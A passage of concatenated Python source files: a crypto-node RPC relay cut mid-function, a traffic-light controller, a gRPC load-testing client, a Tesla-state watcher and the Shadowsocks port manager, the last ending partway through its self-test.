params = [params[0], 1]
if l_xr_method == 'xrsendtransaction':
pass
elif l_token == 'xmr':
rpcurl = 'http://' + rpchost + ':' + rpcport + '/json_rpc'
auth = HTTPDigestAuth(rpcuser,rpcpass)
payload = json.dumps({
'id': 1,
'method': rpc_method,
'params': params,
'jsonrpc': rpcver
})
if l_xr_method == 'xrdecoderawtransaction':
pass
if l_xr_method == 'xrgetblockcount':
try:
res = requests.post(rpcurl, headers=headers, data=payload, auth=auth)
try:
response = json.loads(res.content)
count = str(response['result']['count'])
return count
except ValueError:
return res.content.decode('utf8') # return raw string if json decode fails
except:
return {
'code': 1002,
'error': 'Internal Server Error: failed to connect to ' + xrfunc + ' for token ' + token
}
if l_xr_method == 'xrgetblockhash':
params[0] = int(params[0])
if l_xr_method == 'xrgetblock':
payload = json.dumps({
'id': 1,
'method': rpc_method,
'params': {'hash':params[0]},
'jsonrpc': rpcver
})
if l_xr_method == 'xrgetblocks': # iterate over all ids
response = []
for b_id in params:
params2 = b_id
if l_xr_method == 'xrgetblocks':
payload = json.dumps({
'id': 1,
'method': rpc_method,
'params': {'hash':params2},
'jsonrpc': rpcver
})
try:
res = requests.post(rpcurl, headers=headers, data=payload, auth=auth)
response += [parse_result(json.loads(res.content))]
except:
return {
'code': 1002,
'error': 'Internal Server Error: failed to connect to ' + xrfunc + ' for token ' + token
}
return response
if l_xr_method == 'xrgettransaction':
rpcurl = 'http://' + rpchost + ':' + rpcport + '/get_transactions'
payload = json.dumps({
'txs_hashes': [params[0]],
'decode_as_json': True
})
if l_xr_method == 'xrgettransactions': # iterate over all ids
rpcurl = 'http://' + rpchost + ':' + rpcport + '/get_transactions'
response = []
for b_id in params:
params2 = b_id
if l_xr_method == 'xrgettransactions':
payload = json.dumps({
'txs_hashes': [params2],
'decode_as_json': True
})
try:
res = requests.post(rpcurl, headers=headers, data=payload, auth=auth)
response += [parse_result(json.loads(res.content))]
except:
return {
'code': 1002,
'error': 'Internal Server Error: failed to connect to ' + xrfunc + ' for token ' + token
}
return response
if l_xr_method == 'xrsendtransaction':
rpcurl = 'http://' + rpchost + ':' + rpcport + '/send_raw_transaction'
payload = json.dumps({
'tx_as_hex': params[0],
'do_not_relay': False
})
try:
res = requests.post(rpcurl, headers=headers, data=payload, auth=auth)
try:
response = parse_result(json.loads(res.content))
return response
except ValueError:
return res.content.decode('utf8') # return raw string if json decode fails
except:
return {
'code': 1002,
'error': 'Internal Server Error: failed to connect to ' + xrfunc + ' for token ' + token
}
else:
if l_xr_method == 'xrdecoderawtransaction':
pass
if l_xr_method == 'xrgetblockcount':
pass
if l_xr_method == 'xrgetblockhash':
params[0] = int(params[0])
if l_xr_method == 'xrgetblock':
pass
if l_xr_method == 'xrgetblocks' or l_xr_method == 'xrgettransactions': # iterate over all ids
response = []
for b_id in params:
params2 = [b_id]
if l_xr_method == 'xrgettransactions':
params2 += [1]
payload = json.dumps({
'id': 1,
'method': rpc_method,
'params': params2,
'jsonrpc': rpcver
})
try:
res = requests.post(rpcurl, headers=headers, data=payload)
response += [parse_result(json.loads(res.content))]
except:
return {
'code': 1002,
'error': 'Internal Server Error: failed to connect to ' + xrfunc + ' for token ' + token
}
return response
if l_xr_method == 'xrgettransaction':
params = [params[0], 1]
if l_xr_method == 'xrsendtransaction':
pass
payload = json.dumps({
'id': 1,
'method': rpc_method,
'params': params,
'jsonrpc': rpcver
})
try:
res = requests.post(rpcurl, headers=headers, data=payload)
try:
response = parse_result(json.loads(res.content))
return response
except ValueError:
return res.content.decode('utf8') # return raw string if json decode fails
except:
return {
'code': 1002,
'error': 'Internal Server Error: failed to connect to ' + xrfunc + ' for token ' + token
}
def call_url(xrfunc: str, params: any, env: dict):
rpchost = uwsgi.opt.get('URL_' + xrfunc + '_HOSTIP', b'').decode('utf8')
rpcport = uwsgi.opt.get('URL_' + xrfunc + '_PORT', b'').decode('utf8')
rpcurl = 'http://' + rpchost + ':' + rpcport + str(env.get('PATH_INFO', b''))
headers = {
'Content-Type': 'application/json',
'XR-Pubkey': str(env.get('HTTP_XR_PUBKEY', b'')),
'XR-Signature': str(env.get('HTTP_XR_SIGNATURE', b'')),
'XR-Payment': str(env.get('HTTP_XR_PAYMENT', b'')),
}
payload = '' if len(params) == 0 else json.dumps(params)
try:
res = requests.post(rpcurl, headers=headers, data=payload)
try:
response = json.loads(res.content)
return parse_result(response)
except:
return res.content.decode('utf8')
except:
return {
'code': 1002,
'error': 'Internal Server Error: failed to connect to ' + xrfunc
}
def handle_payment(payment_tx: str, env: dict):
rpchost = uwsgi.opt.get('HANDLE_PAYMENTS_RPC_HOSTIP', b'').decode('utf8')
rpcport = uwsgi.opt.get('HANDLE_PAYMENTS_RPC_PORT', b'').decode('utf8')
rpcuser = uwsgi.opt.get('HANDLE_PAYMENTS_RPC_USER', b'').decode('utf8')
rpcpass = uwsgi.opt.get('HANDLE_PAYMENTS_RPC_PASS', b'').decode('utf8')
rpcver = uwsgi.opt.get('HANDLE_PAYMENTS_RPC_VER', b'1.0').decode('utf8')
rpcurl = 'http://' + rpcuser + ':' + rpcpass + '@' + rpchost + ':' + rpcport
if rpcuser == '' and rpcpass == '': # if no rpc credentials
rpcurl = 'http://' + rpchost + ':' + rpcport
# client pubkey
client_pubkey = str(env.get('HTTP_XR_PUBKEY', b''))
params = [payment_tx]
headers = {'Content-Type': 'application/json'}
payload = json.dumps({
'id': 1,
'method': 'sendrawtransaction',
'params': params,
'jsonrpc': rpcver
})
try:
res = requests.post(rpcurl, headers=headers, data=payload)
enforce = uwsgi.opt.get('HANDLE_PAYMENTS_ENFORCE', b'false').decode('utf8')
# look for valid tx hash in response otherwise fail the check
if enforce is 'true' or enforce is '1':
payment_response = res.content.decode('utf8')
if len(payment_response) != 32 or 'error' in payment_response:
print('Failed to process payment from client: ' + client_pubkey
+ 'Error: ' + payment_response + ' tx hex: ' + payment_tx)
return False
print('Successfully processed payment from client: ' + client_pubkey + ' BLOCK tx: ' + payment_tx)
return True
except:
print('Failed to process payment from client: ' + client_pubkey + ' BLOCK tx: ' + payment_tx)
return False
def parse_result(res: any):
if 'result' in res and res['result']:
return res['result']
else:
return res
def xr_to_rpc(token: str, xr_func: str):
l_xr_method = xr_func.lower()
l_token = token.lower()
if l_token == 'eth' or l_token == 'etc':
if l_xr_method == 'xrdecoderawtransaction': return ''
if l_xr_method == 'xrgetblockcount': return 'eth_blockNumber'
if l_xr_method == 'xrgetblockhash': return 'eth_getBlockByNumber'
if l_xr_method == 'xrgetblock': return 'eth_getBlockByHash'
if l_xr_method == 'xrgetblocks': return 'eth_getBlockByHash'
if l_xr_method == 'xrgettransaction': return 'eth_getTransactionByHash'
if l_xr_method == 'xrgettransactions': return 'eth_getTransactionByHash'
if l_xr_method == 'xrsendtransaction': return 'eth_sendRawTransaction'
elif l_token == 'neo':
if l_xr_method == 'xrdecoderawtransaction': return ''
if l_xr_method == 'xrgetblockcount': return 'getblockcount'
if l_xr_method == 'xrgetblockhash': return 'getblockhash'
if l_xr_method == 'xrgetblock': return 'getblock'
if l_xr_method == 'xrgetblocks': return 'getblock'
if l_xr_method == 'xrgettransaction': return 'getrawtransaction'
if l_xr_method == 'xrgettransactions': return 'getrawtransaction'
if l_xr_method == 'xrsendtransaction': return 'sendrawtransaction'
elif l_token == 'xmr':
if l_xr_method == 'xrdecoderawtransaction': return ''
if l_xr_method == 'xrgetblockcount': return 'get_block_count'
if l_xr_method == 'xrgetblockhash': return 'on_get_block_hash'
if l_xr_method == 'xrgetblock': return 'get_block'
if l_xr_method == 'xrgetblocks': return 'get_block'
if l_xr_method == 'xrgettransaction': return 'get_transactions'
if l_xr_method == 'xrgettransactions': return 'get_transactions'
if l_xr_method == 'xrsendtransaction': return 'send_raw_transaction'
else:
if l_xr_method == 'xrdecoderawtransaction': return 'decoderawtransaction'
if l_xr_method == 'xrgetblockcount': return 'getblockcount'
if l_xr_method == 'xrgetblockhash': return 'getblockhash'
if l_xr_method == 'xrgetblock': return 'getblock'
if l_xr_method == 'xrgetblocks': return 'getblock'
if l_xr_method == 'xrgettransaction': return 'getrawtransaction'
if l_xr_method == 'xrgettransactions': return 'getrawtransaction'
if l_xr_method == 'xrsendtransaction': return 'sendrawtransaction'
return ''
def send_response(result: any, snodekey: bitcoin.wallet.CKey, start_response):
headers = [('Content-Type', 'application/json')]
res_data = result.encode('utf8') if isinstance(result, str) else json.dumps(result).encode('utf8')
# sign the result data if the servicenode key is valid
try:
res_hash = bitcoin.core.Hash(bitcoin.core.serialize.BytesSerializer.serialize(res_data))
sig, i = snodekey.sign_compact(res_hash)
meta = 27 + i
if snodekey.is_compressed:
meta += 4
headers += [('XR-Pubkey', snodekey.pub.hex()),
('XR-Signature', bitcoin.core.b2x(bitcoin.signmessage._bchr(meta) + sig))]
except Exception as e:
print('Unknown signing error: ' + getattr(e, 'message', repr(e)))
start_response('200 OK', headers)
return res_data
|
main.py
|
"""
OVERVIEW:\n
Making a trial program for assigning the red lights of the\n
according to the inputs made by the ML division. \n\n
THEORY:
assign green light to the one which has the greatest time in\n
the array inputted\n
\n
INPUT:\n
a numpy array from ML file that contains the time required to\n
clean the intersections\n
\n
WARNING:\n
Training is turned off. Turn it on by increasing the trainLimit\n
in ml_classes file in ML folder
"""
import numpy as np
from classes import Traffic_Light
from functions import loop_exiter, traffic_light_chooser, all_inactive_converter, time_updater, emergency_detector, get_all_traffic_times
from time import sleep
import threading
from sys import path
from os import getcwd
# this variable sees if the project is on trial on or not
DEBUG = True
#will have to change manually to change default display images
img_dir = 'http://127.0.0.1:8000/1.jpg'
img_dir2 = 'http://127.0.0.1:8000/2.jpg'
img_dir3 = 'http://127.0.0.1:8000/3.jpg'
img_dir4 = 'http://127.0.0.1:8000/4.jpg'
# traffic_time contains all the time values
# taking random values right now for testing
# emergency variable
emergency_loop = False
# variable for exiting the full program
exit_program = False
# defining the traffic lights Here we have to add actual links to the images
light_1 = Traffic_Light( 0, img_dir)
light_2 = Traffic_Light( 1, img_dir2)
light_3 = Traffic_Light( 2, img_dir3)
light_4 = Traffic_Light( 3, img_dir4)
intersection = [ light_1, light_2, light_3, light_4]
# getting the initial times by running the IP part
time_updater( intersection, ip_time= DEBUG) # IP call
# making a loop that will always execute handling the operation
while( 1):
while( not emergency_loop):
# breaking loop if letter q is pressed and held
if loop_exiter():
exit_program = True
break
if DEBUG:
print( 'times are: ', get_all_traffic_times( intersection))
# checking if all are inactive
print( all_inactive_converter( intersection, DEBUG))
# choosing the light that has max time remaining and is active
chosen_id = traffic_light_chooser( intersection)
chosen_traffic_light = intersection[chosen_id]
objectsAtStart = chosen_traffic_light.objectsArray
greenTime = chosen_traffic_light.green_time
# showing the lights for the chosen traffic light
light_thread = threading.Thread( target= chosen_traffic_light.show_light, args= [intersection])
light_thread.start()
# updating the values and using a thread to do it to leave the emergency
update_thread = threading.Thread( target= time_updater, args= [ intersection, True, chosen_id]) # IP call
update_thread.start()
# checking for emergency vehicles while showing lights
# for now pressing button on website causes emergency
if emergency_detector( greenTime, intersection):
emergency_loop = True
break
"""
here we need to change for real values
"""
# ending the light and preparing for next round of the green lights
light_thread.join()
update_thread.join()
# goes into training only if limit is not passed
if chosen_traffic_light.isTraining:
train_thread = threading.Thread( target= chosen_traffic_light.light_trainer, args= [objectsAtStart]) # IP call
train_thread.start()
if DEBUG:
print( 'loop finished')
print( '\n\n')
if exit_program:
print( 'Exiting Program')
break
#________________________________________________________________________________________
# in emergency conditions this thing runs
if DEBUG:
print( 'emergency condition applied')
# changing current green traffic light to yellow for 2 seconds
chosen_traffic_light.change_color( 'yellow', from_emergency= True)
sleep( 2)
#changing all colors to red
print( '\n\nchanging all colors to red')
for tl in intersection:
tl.change_color( 'red')
# extracting the light number
for indx, tl in enumerate( intersection):
if tl.emergency:
emer_id = indx
print( 'emergency at light {}'.format( emer_id))
# choosing the light that has emergency
emer_traffic_light = intersection[emer_id]
# giving input to the chosen light to stop its process
chosen_traffic_light.was_emergency = True
print( 'changing light {} to green-emergency'.format( emer_id))
emer_traffic_light.change_color( 'green', emergency_loop)
emer_timer = 0
# checking for emergency after every second
while( emergency_loop):
sleep( 1)
emer_timer += 1
emergency_loop = emer_traffic_light.emergency
ip_thread = threading.Thread( target= time_updater, args=[intersection])
ip_thread.start()
print( 'Emergency for {} seconds'.format( emer_timer))
print( 'changing light {} to yellow for 5 seconds-emergency'.format( emer_id))
emer_traffic_light.change_color( 'yellow', True)
sleep( 5)
print( 'changing light {} to red-emergency'.format( emer_id))
emer_traffic_light.change_color( 'red', True)
print( 'resetting the traffic lights...')
print( all_inactive_converter( intersection, DEBUG, emergency= True))
emergency_loop = False
ip_thread.join()
print( '\n\n')
|
auto_pilot_frontend_client.py
|
import base64
import os
import time
from concurrent import futures
import threading
import argparse
import sys
import datetime
from multiprocessing import Process, Queue, Lock
from google.protobuf.timestamp_pb2 import Timestamp
import grpc
#from hams_admin.grpcclient import grpc_client
from hams_admin.rpc import (management_pb2, management_pb2_grpc, model_pb2,
model_pb2_grpc, prediction_pb2,
prediction_pb2_grpc)
import logging
logging.basicConfig(level=logging.DEBUG,
format='(%(threadName)-9s) %(message)s',)
def oursystem(ip, port, inputt):
## IP is frontend ip, Port is 22222
channel = grpc.insecure_channel('%s:%s'%(ip, port))
stub = prediction_pb2_grpc.ProxyServerStub(channel)
response = stub.downstream(prediction_pb2.request(input_ = model_pb2.input(inputType = 'string', inputStream = inputt)))
return response.status
def withoutproxy(ip, port, inputt):
## IP is the first container's ip, Port is 22222
time.sleep(1)
return "withoutproxy"
def hams(ip, port, inputt):
## IP is raft-hams leader's ip, Port is ignored
time.sleep(1)
return "hams"
# Producer function that places data on the Queue
def producer(queue, lock, ip, port, inputt_list, func):
# Synchronize access to the console
with lock:
print('Starting worker => {}'.format(os.getpid()))
# Query and return output on the Queue
for inputt in inputt_list:
#time.sleep(random.randint(0, 10))
output = func(ip, port, inputt)
#queue.put(output)
with lock:
print("Input {} returns Output: {}".format(inputt, output))
# Synchronize access to the console
with lock:
print('Worker {} exiting...'.format(os.getpid()))
# Currently no need
# The consumer function takes data off of the Queue
def consumer(queue, lock):
# Synchronize access to the console
with lock:
print('Starting consumer => {}'.format(os.getpid()))
# Run indefinitely
while True:
time.sleep(random.randint(0, 2))
# If the queue is empty, queue.get() will block until the queue has data
output = queue.get()
# Synchronize access to the console
with lock:
print('{} got {}'.format(os.getpid(), output))
def main():
parser = argparse.ArgumentParser(description='concurrent client')
parser.add_argument('--worker', nargs=1, type=int, help="Worker num")
parser.add_argument('--ip', nargs=1, type=str, help="Ip address of your query frontend")
parser.add_argument('--port', nargs=1, type=str, help="Port of your query frontend, for Clipper, put an arbitrary INT")
parser.add_argument('--system', nargs=1, type=str, help="System name: oursystem/withoutproxy/hams")
args = parser.parse_args()
# Generate your inputt list here
inputt_total = [str(i) + "***7***7" for i in range(100)]
# Get configuration
work_num = args.worker[0]
ip = args.ip[0]
port = args.port[0]
system = args.system[0]
# Create the Queue object
queue = Queue()
# Create a lock object to synchronize resource access
lock = Lock()
producers = []
consumers = []
thismodule = sys.modules[__name__]
for i in range(work_num):
# Slice the input_total to $work_num lists
inputt_list = inputt_total[i::work_num]
# Create our producer processes by passing the producer function and it's arguments
producers.append(Process(target=producer, args=(queue, lock, ip, port, inputt_list, getattr(thismodule, system))))
# Create consumer processes
#for i in range(work_num):
# p = Process(target=consumer, args=(queue, lock))
# This is critical! The consumer function has an infinite loop
# Which means it will never exit unless we set daemon to true
# p.daemon = True
# consumers.append(p)
# Start the producers and consumer
# The Python VM will launch new independent processes for each Process object
start = time.time()
for p in producers:
p.start()
#for c in consumers:
# c.start()
# Like threading, we have a join() method that synchronizes our program
for p in producers:
p.join()
end = time.time()
print('Finished %d requests with time:'%(len(inputt_total)))
print(end-start)
print('Parent process exiting...')
if __name__ == '__main__':
main()
|
teslaWatch.py
|
#!/usr/bin/env python3
'''
################################################################################
#
# Script to watch for Tesla state changes
#
# This is to run in the cloud and there will be an Android front-end to
# manage the fences and this will issue notifications to the mobile device.
#
# N.B.
# * Values given on command line override those in the config file.
# * If no DB directory path is given (in either the config file or on the
# command line) then nothing is logged to the DB. Otherwise, all data
# collected from the Tesla API is logged in a sqlite3 DB -- one file
# for each car in the given DB directory, named with each car's VIN.
#
################################################################################
'''
#### TODO add logging
import argparse
import collections
import json
import logging
import multiprocessing as mp
import os
import queue
import random
import signal
import sys
import time
import yaml
import teslajson
from notifier import Notifier
from regions import Region
from teslaCar import Car
import teslaDB
from teslawatch import fatalError, dictMerge
from tracker import Tracker
'''
TODO:
* convert all files over to use 'looging'
'''
# default path to configs file
DEF_CONFIGS_FILE = "./.teslas.yml"
# default path to DB schema file
DEF_SCHEMA_FILE = "./dbSchema.yml"
DEF_LOG_LEVEL = "WARNING"
# Default
# Includes intervals between samples of the Tesla API (quantized to integer
# multiples of the min time), given in units of seconds, and thresholds
#### FIXME
#### TODO make more rational choices for these values
DEF_SETTINGS = {
'intervals': {
'chargeState': 5 * 60,
'climateSettings': 10 * 60,
'driveState': 1,
'guiSettings': 3 * 60,
'vehicleState': 60
},
'thresholds': {
'distance': 0
}
}
def commandInterpreter(trackers, cmds, resps):
''' TBD
'''
#### TODO implement cmd interpreter and send cmds to running trackers to restart them and change their events
cmd = ""
while True:
line = input("> ")
words = line.split(' ')
cmd = words[0].lower().strip()
args = words[1:]
if cmd == 'l':
print(f"Tracking: {trackers.keys()}")
if cmd == 'p':
vin = args[0]
if vin not in trackers:
print(f"ERROR: VIN '{vin}' not being tracked")
else:
print(dumpQueue(resps[vin]))
if cmd == 'r':
pass
if cmd == 's':
vin = args[0]
if vin not in trackers:
print(f"ERROR: VIN '{vin}' not being tracked")
else:
cmds[vin].put("STOP")
#### TODO reread trackers
elif cmd == 'q':
break
elif cmd == '?' or cmd == 'h':
print("Help:")
print(" h: print this help message")
print(" l: show VINs of cars being tracked")
print(" p <vin>: print output from car given by <vin>")
print(" r: stop and restart all trackers, re-reading the configs file")
print(" s <vin>: stop tracking the car given by <vin>")
print(" q: quit")
print(" ?: print this help message")
return
def dumpQueue(q):
''' Return the contents of a given message queue.
'''
result = []
try:
msg = q.get(True, 0.1)
while msg:
result.append(msg)
msg = q.get(True, 0.1)
except queue.Empty:
pass
return result
def run(options):
try:
conn = teslajson.Connection(options.user, options.passwd)
except Exception as e:
fatalError(f"Failed to connect: {e}")
logging.info(f"Connection: {conn}")
logging.info(f"Number of vehicles: {len(conn.vehicles)}")
if options.verbose > 1:
n = 1
for v in conn.vehicles:
print(f"Vehicle #{n}:", end='')
json.dump(v, sys.stdout, indent=4, sort_keys=True)
print("")
n += 1
carVINs = opts.confs['cars'].keys()
if opts.VIN:
carVINs = [opts.VIN]
if not carVINs:
fatalError("Must provide the VIN(s) of one or more car(s) to be tracked")
logging.debug(f"cars: {carVINs}")
teslaVINs = [v['vin'] for v in conn.vehicles]
vinList = [v for v in teslaVINs if v in carVINs]
if not vinList:
fatalError("Unable to find requested cars in Tesla API")
notFound = list(set(carVINs) - set(vinList))
if notFound:
fatalError(f"Cars asked for, but not found in Tesla API: {notFound}")
logging.debug(f"Watching: {vinList}")
notAskedFor = list(set(teslaVINs) - set(vinList))
if notAskedFor:
logging.warning(f"Cars Tesla API knows about, but not asked for: {notAskedFor}")
vehicles = {v['vin']: v for v in conn.vehicles if v['vin'] in vinList}
if options.verbose > 3:
print("VEHICLES:")
json.dump(vehicles, sys.stdout, indent=4, sort_keys=True)
print("")
if opts.schemaFile:
schemaFile = opts.schemaFile
else:
schemaFile = opts.confs.get('schema')
if not os.path.isfile(schemaFile):
fatalError(f"Invalid DB schema file: {schemaFile}")
with open(schemaFile, "r") as f:
schema = yaml.load(f, Loader=yaml.Loader)
if opts.dbDir:
dbDir = opts.dbDir
else:
dbDir = opts.confs.get('dbDir')
if dbDir:
if not os.path.isdir(dbDir):
fatalError(f"Invalid DB directory path: {dbDir}")
else:
if opts.verbose:
logging.warning("Not logging data to DB")
cars = {}
cmdQs = {}
respQs = {}
trackers = {}
for vin in vinList:
conf = opts.confs['cars'][vin]
cars[vin] = car = Car(vin, conf, vehicles[vin])
logging.info(f"Waking up {vin}: {car.getName()}")
if not car.wakeUp():
logging.warning(f"Unable to wake up '{car.getName()}', skipping...")
time.sleep(random.randint(5, 15))
continue
# give car time to wake up and dither start times across cars
#### FIXME time.sleep(random.randint(15, 45))
cdb = None
if dbDir:
dbFile = os.path.join(dbDir, vin + ".db")
cdb = teslaDB.CarDB(vin, dbFile, schema)
tables = schema['tables'].keys()
settings = dict(DEF_SETTINGS)
dictMerge(settings, opts.confs.get('config', {}).get('settings', {}))
regions = [Region(r) for r in conf.get('regions', [])]
notifier = Notifier(opts.confs.get('config', {}).get('eventNotifiers', {}))
cmdQs[vin] = mp.Queue()
respQs[vin] = mp.Queue()
tracker = Tracker(car, cdb, tables, settings, regions, notifier,
cmdQs[vin], respQs[vin])
logging.info(f"Tracker: {vin}")
trackers[vin] = mp.Process(target=tracker.run, args=())
for vin in trackers:
trackers[vin].start()
if options.interactive:
commandInterpreter(trackers, cmdQs, respQs)
for vin in trackers:
trackers[vin].join()
logging.debug(f"Results for {vin}: {dumpQueue(respQs[vin])}")
def getOps():
def signalHandler(sig, frame):
''' Catch SIGHUP to force a reload/restart and SIGINT to stop all.""
'''
if sig == signal.SIGHUP:
logging.info("SIGHUP")
#### TODO stop, reload, and restart everything
elif sig == signal.SIGINT:
logging.info("SIGINT")
for vin in cmdQs:
logging.debug(f"Stopping: {vin}")
cmdQs[vin].put("STOP")
usage = f"Usage: {sys.argv[0]} [-v] [-c <configsFile>] [-d <dbDir>] [-i] [-L <logLevel>] [-l <logFile>] [-p <passwd>] [-s <schemaFile>] [-V <VIN>]"
ap = argparse.ArgumentParser()
ap.add_argument(
"-c", "--configsFile", action="store", type=str,
default=DEF_CONFIGS_FILE, help="path to file with configurations")
ap.add_argument(
"-d", "--dbDir", action="store", type=str,
help="path to a directory that contains the DB files for cars")
ap.add_argument(
"-i", "--interactive", action="store_true", default=False,
help="enable interactive mode")
ap.add_argument(
"-L", "--logLevel", action="store", type=str, default=DEF_LOG_LEVEL,
choices=["DEBUG", "INFO", "WARNING", "ERROR", "CRITICAL"],
help="Logging level")
ap.add_argument(
"-l", "--logFile", action="store", type=str,
help="Path to location of logfile (create it if it doesn't exist)")
ap.add_argument(
"-p", "--password", action="store", type=str, help="user password")
ap.add_argument(
"-s", "--schemaFile", action="store", type=str, default=DEF_SCHEMA_FILE,
help="path to the JSON Schema file that describes the DB's tables")
ap.add_argument(
"-V", "--VIN", action="store", type=str,
help="VIN of car to use (defaults to all found in config file")
ap.add_argument(
"-v", "--verbose", action="count", default=0, help="print debug info")
opts = ap.parse_args()
if not os.path.exists(opts.configsFile):
fatalError(f"Invalid configuration file: {opts.configsFile}")
#### TODO add check if configs file has proper protections
with open(opts.configsFile, "r") as confsFile:
confs = list(yaml.load_all(confsFile, Loader=yaml.Loader))[0]
if opts.verbose > 3:
json.dump(confs, sys.stdout, indent=4, sort_keys=True) #### TMP TMP TMP
print("")
#### TODO validate config file against ./configSchema.yml, remove error checks and rely on this
if opts.logLevel:
confs['config']['logLevel'] = opts.logLevel
else:
if 'logLevel' not in confs['config']:
confs['config']['logLevel'] = DEF_LOG_LEVEL
logLevel = confs['config']['logLevel']
l = getattr(logging, logLevel, None)
if not isinstance(l, int):
fatalError(f"Invalid log level: {logLevel}")
if opts.logFile:
confs['config']['logFile'] = opts.logFile
logFile = confs['config'].get('logFile')
if opts.verbose:
print(f"Logging to: {logFile}")
if logFile:
logging.basicConfig(filename=logFile, level=l)
else:
logging.basicConfig(level=l)
opts.user = confs.get('user')
if not opts.user:
input("user: ")
logging.debug(f"user: {opts.user}")
# N.B. precedence order: command line options then config file inputs.
# if neither given, then propmt user for console input
if opts.password:
password = opts.password
else:
password = confs.get('passwd')
if not password:
password = input("password: ")
opts.passwd = password
signal.signal(signal.SIGHUP, signalHandler)
signal.signal(signal.SIGINT, signalHandler)
opts.confs = confs
return opts
if __name__ == '__main__':
opts = getOps()
run(opts)
|
manager.py
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
#
# Copyright 2015 clowwindy
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from __future__ import absolute_import, division, print_function, \
with_statement
import errno
import traceback
import socket
import logging
import json
import collections
from shadowsocks import common, eventloop, tcprelay, udprelay, asyncdns, shell
BUF_SIZE = 1506
STAT_SEND_LIMIT = 50
class Manager(object):
def __init__(self, config):
self._config = config
self._relays = {} # (tcprelay, udprelay)
self._loop = eventloop.EventLoop()
self._dns_resolver = asyncdns.DNSResolver()
self._dns_resolver.add_to_loop(self._loop)
self._statistics = collections.defaultdict(int)
self._control_client_addr = None
try:
manager_address = common.to_str(config['manager_address'])
if ':' in manager_address:
addr = manager_address.rsplit(':', 1)
addr = addr[0], int(addr[1])
addrs = socket.getaddrinfo(addr[0], addr[1])
if addrs:
family = addrs[0][0]
else:
logging.error('invalid address: %s', manager_address)
exit(1)
else:
addr = manager_address
family = socket.AF_UNIX
self._control_socket = socket.socket(family,
socket.SOCK_DGRAM)
self._control_socket.bind(addr)
self._control_socket.setblocking(False)
except (OSError, IOError) as e:
logging.error(e)
logging.error('can not bind to manager address')
exit(1)
self._loop.add(self._control_socket,
eventloop.POLL_IN, self)
self._loop.add_periodic(self.handle_periodic)
port_password = config['port_password']
del config['port_password']
for port, password in port_password.items():
a_config = config.copy()
a_config['server_port'] = int(port)
a_config['password'] = password
self.add_port(a_config)
def add_port(self, config):
port = int(config['server_port'])
servers = self._relays.get(port, None)
if servers:
logging.error("server already exists at %s:%d" % (config['server'],
port))
return
logging.info("adding server at %s:%d" % (config['server'], port))
t = tcprelay.TCPRelay(config, self._dns_resolver, False,
stat_callback=self.stat_callback)
u = udprelay.UDPRelay(config, self._dns_resolver, False,
stat_callback=self.stat_callback)
t.add_to_loop(self._loop)
u.add_to_loop(self._loop)
self._relays[port] = (t, u)
def remove_port(self, config):
port = int(config['server_port'])
servers = self._relays.get(port, None)
if servers:
logging.info("removing server at %s:%d" % (config['server'], port))
t, u = servers
t.close(next_tick=False)
u.close(next_tick=False)
del self._relays[port]
else:
logging.error("server not exist at %s:%d" % (config['server'],
port))
def handle_event(self, sock, fd, event):
if sock == self._control_socket and event == eventloop.POLL_IN:
data, self._control_client_addr = sock.recvfrom(BUF_SIZE)
parsed = self._parse_command(data)
if parsed:
command, config = parsed
a_config = self._config.copy()
if config:
# let the command override the configuration file
a_config.update(config)
if 'server_port' not in a_config:
logging.error('can not find server_port in config')
else:
if command == 'add':
self.add_port(a_config)
self._send_control_data(b'ok')
elif command == 'remove':
self.remove_port(a_config)
self._send_control_data(b'ok')
elif command == 'ping':
self._send_control_data(b'pong')
else:
logging.error('unknown command %s', command)
def _parse_command(self, data):
# commands:
# add: {"server_port": 8000, "password": "foobar"}
# remove: {"server_port": 8000"}
data = common.to_str(data)
parts = data.split(':', 1)
if len(parts) < 2:
return data, None
command, config_json = parts
try:
config = shell.parse_json_in_str(config_json)
return command, config
except Exception as e:
logging.error(e)
return None
def stat_callback(self, port, data_len):
self._statistics[port] += data_len
def handle_periodic(self):
r = {}
i = 0
def send_data(data_dict):
if data_dict:
# use compact JSON format (without space)
data = common.to_bytes(json.dumps(data_dict,
separators=(',', ':')))
self._send_control_data(b'stat: ' + data)
for k, v in self._statistics.items():
r[k] = v
i += 1
# split the data into segments that fit in UDP packets
if i >= STAT_SEND_LIMIT:
send_data(r)
r.clear()
i = 0
if len(r) > 0:
send_data(r)
self._statistics.clear()
def _send_control_data(self, data):
if self._control_client_addr:
try:
self._control_socket.sendto(data, self._control_client_addr)
except (socket.error, OSError, IOError) as e:
error_no = eventloop.errno_from_exception(e)
if error_no in (errno.EAGAIN, errno.EINPROGRESS,
errno.EWOULDBLOCK):
return
else:
shell.print_exception(e)
if self._config['verbose']:
traceback.print_exc()
def run(self):
self._loop.run()
def run(config):
Manager(config).run()
def test():
import time
import threading
import struct
from shadowsocks import encrypt
logging.basicConfig(level=5,
format='%(asctime)s %(levelname)-8s %(message)s',
datefmt='%Y-%m-%d %H:%M:%S')
enc = []
eventloop.TIMEOUT_PRECISION = 1
def run_server():
config = shell.get_config(True)
config = config.copy()
a_config = {
'server': '127.0.0.1',
'local_port': 1081,
'port_password': {
'8381': 'foobar1',
'8382': 'foobar2'
},
'method': 'aes-256-cfb',
'manager_address': '127.0.0.1:6001',
'timeout': 60,
'fast_open': False,
'verbose': 2
}
config.update(a_config)
manager = Manager(config)
enc.append(manager)
manager.run()
t = threading.Thread(target=run_server)
t.start()
time.sleep(1)
manager = enc[0]
cli = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
cli.connect(('127.0.0.1', 6001))
# test add and remove
time.sleep(1)
cli.send(b'add: {"server_port":7001, "password":"asdfadsfasdf"}')
time.sleep(1)
assert 7001 in manager._relays
data, addr = cli.recvfrom(1506)
assert b'ok' in data
cli.send(b'remove: {"server_port":8381}')
time.sleep(1)
assert 8381 not in manager._relays
data, addr = cli.recvfrom(1506)
assert b'ok' in data
logging.info('add and remove test passed')
# test statistics for TCP
header = common.pack_addr(b'google.com') + struct.pack('>H', 80)
data = encrypt.encrypt_all(b'asdfadsfasdf', 'aes-256-cfb', 1,
header + b'GET /\r\n\r\n')
tcp_cli = socket.socket()
tcp_cli.connect(('127.0.0.1', 7001))
